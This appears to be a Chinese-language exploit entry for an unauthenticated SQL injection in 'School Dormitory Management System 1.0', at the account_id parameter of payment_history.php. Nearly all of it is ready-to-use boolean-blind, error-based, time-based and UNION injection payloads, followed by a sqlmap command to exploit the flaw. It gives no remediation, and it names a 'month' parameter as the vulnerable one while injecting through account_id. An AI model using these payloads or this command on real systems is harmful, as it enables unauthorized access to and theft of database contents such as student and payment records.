学校宿舍管理系统 1.0 - 未经身份验证的 SQL 注入
[#] 漏洞位置:
$_GET['month'] 位于 /dms/admin/accounts/payment_history.php:31
参数:account_id (GET)
类型:基于布尔的盲注
标题:AND 基于布尔的盲注 - WHERE 或 HAVING 子句
载荷:account_id=2' AND 6703=6703 AND 'jmUS'='jmUS
类型:基于错误的注入
标题:MySQL >= 5.0 基于错误注入 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句 (FLOOR)
载荷:account_id=2' AND (SELECT 7343 FROM(SELECT COUNT(*),CONCAT(0x71716b7671,(SELECT (ELT(7343=7343,1))),0x7170626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'htiO'='htiO
类型:基于时间的盲注
标题:MySQL >= 5.0.12 基于时间的盲注 (查询 SLEEP)
载荷:account_id=2' AND (SELECT 2865 FROM (SELECT(SLEEP(5)))hWAb) AND 'pbGX'='pbGX
类型:UNION 查询
标题:通用 UNION 查询 (NULL) - 7 列
载荷:account_id=2' UNION ALL SELECT CONCAT(0x71716b7671,0x6458467273575152444c465a7a5276684f74756c7a754b6d506a6c437a5a516479574d5844694b78,0x7170626a71),NULL,NULL,NULL,NULL,NULL,NULL-- -
[#] 使用 SQLMAP 进行利用:
sqlmap -u "http://localhost/dms/admin/accounts/payment_history.php?account_id=2" --dbms=mysql